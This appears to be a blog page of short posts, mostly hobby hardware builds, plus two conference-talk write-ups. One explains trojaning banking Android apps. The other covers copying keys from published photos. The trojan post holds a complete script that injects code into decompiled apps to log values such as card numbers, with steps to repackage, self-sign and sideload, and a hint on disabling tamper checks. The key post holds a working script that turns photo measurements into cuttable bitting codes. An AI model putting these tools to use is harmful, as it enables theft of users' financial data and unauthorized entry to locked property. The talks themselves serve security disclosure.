The Ease Of Adding Trojans To Major Financial Android Apps

This was both an amusing and frightening talk. [Sam Bowne] presented How to Trojan Financial Android Apps on Saturday afternoon at the LayerOne Conference. [Sam] calculates that 80-90% of the apps provided by major financial institutions like banks and investment companies are vulnerable and the ease with which trojans can be rolled into them is incredible.

Some Background

[Sam] did a great job of concisely describing the circumstances that make Android particularly vulnerable to the attacks which are the subject of the talk. Android apps ship as APK files, which are ordinary zip archives and trivial to unpack. The compiled code inside (classes.dex) is Dalvik bytecode; a disassembler such as apktool or baksmali turns it into smali, an assembler-like listing that keeps the class, method, field and (where the build left debug info in place) local variable names, so it reads almost as well as the Java source and can be searched with grep. Once the interesting parts are located, the smali can be edited and the whole thing reassembled and repackaged. The app then has to be re-signed, but Android only requires that an APK be signed, not that the key be issued or trusted by Google, so an attacker simply generates a key and signs with it. The one catch is that the repackaged APK cannot be installed as an update over the genuine copy, since the signing keys differ, so the victim has to install it fresh. Android allows sideloading from web pages, email and the like once “Unknown sources” is enabled, so this isn’t much of a hurdle for the bad guys either.

The Attack

So what can be done? This is about information harvesting. [Sam’s] proof of concept uses a Python script to insert logging for every local variable. The script looks at the start of every method in the smali code, reads the .locals count (the number of registers the method reserves for local variables), increments it by one, and uses the extra register to write the values out to the system log via android.util.Log, where they can be read with logcat.

ADB log shows the credit card number

He demonstrated live on the Bank of America app. From the user side of things it looks exactly like the official app, because it is the official app with a few instructions added. However, when you register your account the log reports the card number, as you can see above. Logging is only the proof of concept; the same injected instructions could just as easily hand the value to code that phones it home, using any number of techniques.
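To make the mechanics concrete, here is an added example in the spirit of the talk, written for this article and not [Sam Bowne]’s own script: it walks a smali file, bumps each method’s .locals count by one, parks a log tag in the new register and calls android.util.Log.d() so the harvested values show up in logcat. It only logs parameters declared as java.lang.String, since Log.d() wants Strings, where the talk’s script dumped every local. The sample method, the HARVEST tag and the file layout are assumptions; the smali syntax and the 16-register limit on a plain invoke-static are real.

```python
"""Instrument smali so every method logs its String parameters on entry.

Added example for this article, not the talk's script.  Run it over the
smali/ tree that `apktool d` produces, then `apktool b`, sign with your own
key and sideload.  Methods that use `.registers` instead of `.locals` are
left alone to keep the example short.
"""
import sys
from pathlib import Path

LOG_TAG = "HARVEST"  # assumption: any tag works, the attacker greps logcat for it
LOG_D = "Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I"
MAX_NONRANGE_REG = 15  # invoke-static {...} only addresses v0..v15; above that needs /range


def parse_descriptors(params):
    """Split 'Ljava/lang/String;[IJ' into ['Ljava/lang/String;', '[I', 'J']."""
    out, i = [], 0
    while i < len(params):
        start = i
        while params[i] == "[":          # array prefix, any depth
            i += 1
        if params[i] == "L":             # class type runs to the ';'
            i = params.index(";", i) + 1
        else:                            # primitive: one character
            i += 1
        out.append(params[start:i])
    return out


def parse_method_header(line):
    """'.method public static foo(Ljava/lang/String;I)V' -> (is_static, descriptors)."""
    head, rest = line.split("(", 1)
    params = rest.rsplit(")", 1)[0]
    flags = head.split()[1:-1]           # words between '.method' and the name
    return "static" in flags, parse_descriptors(params)


def log_calls(is_static, descs, old_locals):
    """Instructions to insert after '.locals', or [] if nothing can be logged."""
    new_locals = old_locals + 1
    tag_reg = old_locals                 # the added local is v<old_locals>
    if tag_reg > MAX_NONRANGE_REG:
        return []
    calls = []
    preg = 0 if is_static else 1         # p0 is 'this' in instance methods
    for desc in descs:
        # parameter pN sits at absolute register new_locals + N after the bump
        if desc == "Ljava/lang/String;" and new_locals + preg <= MAX_NONRANGE_REG:
            calls.append(f"invoke-static {{v{tag_reg}, p{preg}}}, {LOG_D}")
        preg += 2 if desc in ("J", "D") else 1   # long/double occupy two registers
    if calls:
        calls.insert(0, f'const-string v{tag_reg}, "{LOG_TAG}"')
    return calls


def instrument(smali):
    """Return the smali text with String parameters logged at method entry."""
    out, method = [], None
    for line in smali.splitlines():
        stripped = line.strip()
        if stripped.startswith(".method "):
            method = parse_method_header(stripped)
        elif stripped == ".end method":
            method = None
        elif method and stripped.startswith(".locals "):
            indent = line[: len(line) - len(line.lstrip())]
            old = int(stripped.split()[1])
            calls = log_calls(*method, old)
            if calls:
                out.append(f"{indent}.locals {old + 1}")
                out.extend(indent + c for c in calls)
                continue
        out.append(line)
    return "\n".join(out) + "\n"


# Constructed sample: what a registration screen's method might look like
# after baksmali.  Names are made up, not taken from any real app.
SAMPLE = """\
.method public registerCard(Ljava/lang/String;I)V
    .locals 2
    .param p1, "cardNum"    # Ljava/lang/String;
    .param p2, "expMonth"    # I

    return-void
.end method
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:                # in-place over an unpacked APK tree
        for path in Path(sys.argv[1]).rglob("*.smali"):
            path.write_text(instrument(path.read_text()))
    else:
        print(instrument(SAMPLE))
```

Because the `.param` lines survive, the log line carries the method and the parameter name the developer chose, which is exactly why descriptive names like the one in the Bank of America example make grep so effective.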

As mentioned, the vast majority of banking and financial apps are vulnerable to this, but some have made an attempt to make it more difficult. He found the Bancorp app never exposes this information in local variables, so it can’t just be logged out. However, the same trojan technique works as a keylogger, since he found the same function kept getting called every time a key is pressed. The same was true of the Capital One app, but it echoes Android KeyEvent key codes rather than ASCII; easy enough to translate back into readable data, though.

The Inability to Report Vulnerabilities

What is most troubling is that none of these companies have a means of reporting security vulnerabilities. It was amusing to hear [Sam] recount his struggle to report these issues to Charles Schwab. Online contact forms were broken and wouldn’t post data, and several publicly posted email addresses bounced. When he finally got one to accept the email, he later discovered another user reporting on a forum that nobody ever answers back on any of the Schwab accounts. He resorted to a trick he has used many times in the past: tweeting at the CEO of Charles Schwab to start a direct-message conversation. This is itself a security problem, as @SwiftOnSecurity pointed out: whenever @SamBowne tweets at a CEO it’s because he found a vulnerability in that company’s platform and can’t find a reasonable way to contact the company.

There is Hope

Although very rare, sometimes these apps do get patched. The TradeKing app was updated after his report, and when [Sam] tried the exploit again it crashed at start-up; the log reports a verification failure. That indicates the injected code is being detected, but [Sam] wonders whether the verification runs inside the app itself. If it does, it lives in the same smali the attacker already controls, so it can be tracked down and disabled, for instance by patching the check so it always passes.

This may sound like all of us Android users should despair, but that’s not the case. Adding verification, even if it can be defeated, does make the apps safer; attackers may not want to invest the extra time to defeat it. Also, there are obfuscators available for a few thousand dollars that will make these attacks much more difficult by making variable names unreadable. The free obfuscator that ships with the Android development tools (ProGuard) doesn’t change the names of everything: [Sam] found local variables left unaltered, and programmers have a habit of using descriptive names for variables. For instance, BofA used “CARDNUM” in the example above. Keep in mind that obfuscation raises the cost rather than removing the attack; the keylogger variant never needed a readable name, only the method that fires on every key press.

The Slides

[Sam Bowne’s] slides and testing results for the entire talk are available under the “Upcoming Events” part of his website.

Absolute Overkill IKEA Lampan Lamp Hack

Sometimes too much overkill isn’t enough. [Jesus Echavarria] hacked an IKEA Lampan light for his daughter to add color LEDs, a timer, Bluetooth control over the hue, and a local override knob. The result: a $5 lamp with at least $50 of added awesomeness. Let’s have a look at the latter.

The whole lamp system is based around a PIC microcontroller and WS2811 LEDs for the color light show. Since the lamp was already built to run a 40W lightbulb, and [Jesus] wanted to retain that functionality, he added an SSR to the build. Yeah, it’s rated for 5,000W, but it’s what he had on hand.

Next comes the low-voltage power supply. [Jesus] needed 5V for the PIC, and used the guts from a cheap USB charger as a quick and dirty 5V converter — a nice hack. To power the HC-05 Bluetooth module, which requires 3.3V, he wired up a low-dropout voltage regulator to the 5V line. A level-converter IC (74LVC07) gets the logic voltage levels straight between the two.

A fuse for the high-voltage power line, screw-terminal connectors all around, and a potentiometer for manual override round out the hardware build.

On the software side, [Jesus] set up the knob to turn on and off the built-in lamp as well as control the colors of the LED ring. That’s a nice touch for when his daughter wants to change the lamp’s color, but doesn’t want to go find her cellphone. But when she does, the SPP Pro app sets the colors by sending pre-programmed serial commands over Bluetooth to the PIC in the lamp.

All in all, a nice build, well-documented, and with enough rough edges that none of you out there can say it’s not a hack. Nice job [Jesus]! We can’t wait to see what he does next… robot lamp anyone?

Spin DIY Photography Turntable System

A motorised turntable is very handy when taking product pictures, or creating animated GIFs or walk-around views. [Tiffany Tseng] built Spin, a DIY photography turntable system for capturing how DIY projects come together over time. It is designed to help people share their projects in an engaging way by creating GIFs and videos which are easy to post on social networks like Twitter and Facebook.

The device is a lazy susan driven by a stepper motor controlled via an Arduino and an Easy Driver motor driver shield. The Spin system uses the Soft Modem library to send signals from an iPhone to the Arduino over the phone’s audio socket. The Spin iOS app is currently in beta and is invite only. After you’ve built your own Spin turntable, take a picture of it and request the app. Of course, there are many different ways of controlling the motor, so if you are handy you can build your own controller. But [Tiffany]’s iOS app provides a way to stitch the various images into an animated GIF and then share them easily. Building the turntable should be straightforward if you grab the design files from the GitHub repo, follow the detailed instructions on the build page, and have access to a laser cutter and a 3D printer.

Check out a few similar turntable hacks we’ve featured in the past, such as one that uses the motor from a scanner, an attempt that just didn’t end up working smoothly, and one that uses a belt-drive system. There’s a video of the turntable in action after the break.


Hackaday Prize Entry: Arduino MPPT Controller

Imagine you’re building a small solar installation. The naive solution would be grabbing a solar panel from Horror Freight, getting a car battery and AC inverter, and hoping everything works. This is the dumb solution. To get the most out of a solar panel you need to run it at its maximum power point and convert that voltage to what the battery wants, rather than letting the battery drag the panel down to its own voltage. How do you do that? With [Debasish]’s entry for The Hackaday Prize, an Arduino MPPT Solar Charge Controller.

This Maximum Power Point Tracker uses a buck converter to step down the voltage from the solar cell to the voltage of the battery. It’s extremely efficient and every proper solar installation will need a charge controller that does something similar.

For his MPPT, [Debasish] is using an Arduino Nano for all the math, a DC to DC buck converter, and a few MOSFETs. Extremely simple, but [Debasish] is connecting the entire controller to the Internet with an ESP8266 module. It’s a great example of building something for much less than it would cost to buy the same thing, and a great example for something that has a chance at making the world a little better.

NES Controller Made Out Of Fused Craft Beads

Close your eyes and think back, far back when you were a wee kid. Remember those colored beads that a child would populate on a small plastic peg board, arranged in some sort of artsy pattern, then ironed to fuse the beads together into a crafty trinket? They were fun for kids but what good are they to us adults nowadays? Well, [Lalya] has shown that they can be used to make a unique and interesting NES Controller.

First, the controller’s front panel was laid out on the pegboard, remembering to lay it out in reverse so the melted side of the beads was facing into the controller. Holes were left in the top panel for the D-pad and B/A buttons. The sides, back and bottom panels of the controller were made the same way. Hot glue holds the case panels together.


Inside the case is an Arduino and breadboard with three through-hole momentary buttons. These are wired up to the Arduino inputs and a sketch emulates keystrokes when connected to a computer. Unfortunately, the D-pad’s functionality is just a button right now. [Lalya] uses the project to control iTunes.  Maybe the next revision will be more video game friendly.

Having your own NES controller recreation might not be high on your list. But you have to admit that this is a pretty simple and inexpensive way to make custom enclosures.


3D Scanning Rig And DIY Turntable

It seems almost every day 3D scanning is becoming more and more accessible to the general DIYer. The hardware required is minimal and there are several scanning software packages and workflows to choose from. However, if you have slowly walked around a subject while holding a Kinect and trying to get a good scan, you know this is not an easy task. A quick internet search will turn up several DIY scanning setups that have been cobbled together and lack substantial documentation... until now! [aldricnegrier] is fighting back and has designed and documented a rotary table that spins at a constant speed while a subject is 3D scanned, making person scanning just that much easier.

The project starts off with a plywood base with a Lazy Susan bearing assembly attached to the top. The Lazy Susan supports the rotating platform for the subject person to stand on, but it’s not just a platform, it’s also a huge gear! The platform teeth mesh with a much smaller 3D printed gear mounted on the shaft of a DC motor and reduction gearbox assembly.

Another goal of the project was to make the rotary table autonomous. There is an ultrasonic sensor mounted to the base aimed above the rotating platform. The ultrasonic sensor is connected to an Arduino and if the system senses someone or something on the platform for 3 seconds, the Arduino will command a DC motor driver to start spinning the platform.

As cool as this project is so far, [aldricnegrier] wanted to make it even cooler: he added speech recognition. Using Microsoft’s Speech Toolkit, saying the words ‘Start Skanect‘ will start the scanning process on the PC. Now, a sole person can scan themselves easily and reliably.

[aldricnegrier] has made all of his CAD files, STL files and Arduino code available so anyone wanting to build this clearly capable setup can do so!

Pictures That Defeat Key Locks

We’re at LayerOne this weekend and one of the talks we were excited about didn’t disappoint. [Jos Weyers] presented Showing Keys in Public — What Could Possibly Go Wrong? The premise is that pictures of keys, in most cases, are as good as the keys themselves. And that pictures of keys keep getting published.

[Jos] spoke a bit about new services that offer things like 3D scanning and storage of your key for printing when you get locked out, or apps that ask you to take a picture of your key and they’ll mail you a duplicate. Obviously this isn’t the best of ideas; the bitting of a key is its password, and you’re handing it over. And finding a locksmith is easier than finding a 3D printer. But it’s the media gaffes with important keys that intrigue us.

We’ve already seen the proof of concept for taking covert images to perfectly duplicate a key. But these examples are not so covert. One example is a police officer carrying around handcuff keys on a belt clip. Pose for a picture and that key design is now available to all. But news stories about compromised keys are the biggest offenders.

A master key for the NYC Subway was compromised and available for sale. The news coverage not only shows a picture at the top of the story of a man holding the key up straight on, but also this image of it lying on a subway map, which gives anyone a reference for scale. This key, which is still published openly on the news story linked above, opens 468 doors to the subway system, and these are more than just the ones that get you onto the platform for free. We were unable to determine if these locks have been changed, but the sheer number of them has us thinking that it’s unlikely.

Worse was the availability of fire-department master keys which open lock boxes outside of every building. (Correction: these are fire department keys but not the actual lock-box keys.) The locksmith that used to cut the original keys went out of business and sold off all their stock. These keys were being sold for $150, which is bad enough. But the news coverage showed each key on a white background, straight on, with annotations of where each type of key will work.

Other examples include video news stories about credit card skimmers installed in gas pumps — that coverage showed the key used to open the pump housing. There was also an example of speed camera control cabinet keys being shown by a reporter.

[Jos’] example of doing the right thing is to use a “prop” key for news stories. Here he is posing with a key after the talk. Unfortunately this is my own house key, but I’m the one taking pictures and I have blurred the teeth for my own security. However, I was shocked during image editing at the quality of the outline: the image was taken at 6000×4000 with no intent to make something that would serve as a source for a copy, and it still came out remarkably clear.

Some locks are stronger than others, but they’re all meaningless if we’re giving away the keys.
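To show why a straight-on photo next to an object of known size is as good as the key, here is an added example, written for this article and not from [Jos Weyers]’ talk: it turns pixel measurements taken off such a photo into the depth codes a locksmith would cut. The key geometry is the commonly published Schlage SC1 spec (five pins, ten depths, 0.015" steps), which you should treat as an assumption and check against a code book before cutting anything; the pixel measurements are constructed, and the credit-card width is only one convenient scale reference.

```python
"""Decode a pin-tumbler key's bitting from measurements made on a photo.

Added example, not from the talk.  Inputs are pixel coordinates read off
the image; the scale comes from an object of known size in the same frame
(a map, a ruler, a card).  Geometry below is the published Schlage SC1
spec and is an assumption: verify before use.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class KeySpec:
    name: str
    pins: int
    root_depth0: float    # blade bottom to cut root at depth 0, inches
    increment: float      # one depth step, inches
    first_cut: float      # shoulder to first cut centre, inches
    spacing: float        # centre-to-centre cut spacing, inches
    max_depth: int
    macs: int             # maximum adjacent cut specification


# Assumed Schlage SC1 geometry (widely published; check a code book).
SC1 = KeySpec("Schlage SC1", 5, 0.335, 0.015, 0.231, 0.156, 9, 7)
CREDIT_CARD_WIDTH_IN = 3.370   # ISO/IEC 7810 ID-1 card, a handy scale reference


def pixels_per_inch(reference_px, reference_inches):
    """Image scale from an object of known size lying in the same plane as the key."""
    return reference_px / reference_inches


def cut_positions_px(shoulder_x, ppi, spec=SC1, tip_right=True):
    """Pixel x of each cut centre, walking from the shoulder toward the tip."""
    sign = 1 if tip_right else -1
    return [shoulder_x + sign * (spec.first_cut + i * spec.spacing) * ppi
            for i in range(spec.pins)]


def decode_bitting(blade_bottom_y, root_ys, ppi, spec=SC1, tolerance=0.3):
    """Map measured cut-root heights to depth codes.

    root_ys: pixel y of the bottom of each cut, ordered as cut_positions_px().
    A cut whose measurement lands more than `tolerance` of an increment from
    any code is returned as None (re-measure it).  Raises ValueError when the
    result is impossible for the spec, which usually means the scale is wrong.
    """
    if len(root_ys) != spec.pins:
        raise ValueError(f"{spec.name} has {spec.pins} cuts, got {len(root_ys)}")
    codes = []
    for y in root_ys:
        height_in = (blade_bottom_y - y) / ppi               # image y grows downward
        exact = (spec.root_depth0 - height_in) / spec.increment
        code = round(exact)
        if not 0 <= code <= spec.max_depth:
            raise ValueError(f"depth {exact:.2f} outside 0..{spec.max_depth}; check scale")
        codes.append(code if abs(exact - code) <= tolerance else None)
    for a, b in zip(codes, codes[1:]):
        if a is not None and b is not None and abs(a - b) > spec.macs:
            raise ValueError(f"adjacent cuts {a} and {b} exceed MACS {spec.macs}")
    return codes


if __name__ == "__main__":
    # Constructed measurements: a card 674 px wide gives 200 px/in, the blade's
    # bottom edge sits at y=1000 and the five cut roots were read at these ys.
    ppi = pixels_per_inch(674, CREDIT_CARD_WIDTH_IN)
    print("cut centres (px):", [round(x, 1) for x in cut_positions_px(120, ppi)])
    print("bitting:", decode_bitting(1000, [942, 948, 939, 954, 945], ppi))
```

The tolerance and the MACS check are what separate a usable decode from a guess: a one-pixel error at 200 px/in is a third of a Schlage increment, so low-resolution or angled shots leave some cuts marked None, while a scale mistake tends to push the whole set out of range or past the adjacent-cut limit and is caught as an error rather than cut into brass.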